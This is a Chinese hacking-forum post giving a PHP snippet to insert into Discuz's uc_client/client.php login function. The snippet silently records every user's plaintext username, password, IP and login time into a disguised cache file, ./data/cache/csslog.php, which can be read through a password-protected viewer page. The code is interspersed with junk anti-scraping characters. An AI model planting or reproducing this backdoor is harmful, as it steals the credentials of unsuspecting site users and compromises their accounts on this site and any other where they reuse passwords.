中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
5 S+ ^: {/ R$ f1 {% s  Q- qfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
/ K0 X+ M0 B3 v) I; Q$ q下加入如上代码,在网站./data/cache/目录下自动生成csslog.php7 ?# h1 i  o3 W9 H) o4 U. M" i) l
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
5 r5 U: c; d: ]$ X( |4 Vif(getenv('HTTP_CLIENT_IP')) { " O( T/ h$ \, X' c/ S
$onlineip = getenv('HTTP_CLIENT_IP');0 W; s' C  \5 K, n6 _: H
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
1 S! a( L) C6 ^" n' f+ ?1 Q" ^$onlineip = getenv('HTTP_X_FORWARDED_FOR');
. I+ K) g  w) Z( \. A) v& ~: W} elseif(getenv('REMOTE_ADDR')) { 2 f: W/ {- P/ ?' t" x. T" W3 v
$onlineip = getenv('REMOTE_ADDR');
7 F1 L7 p4 [7 S. p4 T' T: x} else { " O& k: S$ Q( D* D4 z8 W
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
3 X3 a5 m- u: N! D2 b/ J) B/ h}2 L( q  f* J# V6 z+ U. s  F
     $showtime=date("Y-m-d H:i:s");
+ w( t0 c0 v7 |' D- B8 b    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$ v+ ?  g* T# l' z% {. z( P    $handle=fopen('./data/cache/csslog.php','a+');
- m, W' ?9 e6 H# i# G7 h1 W    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2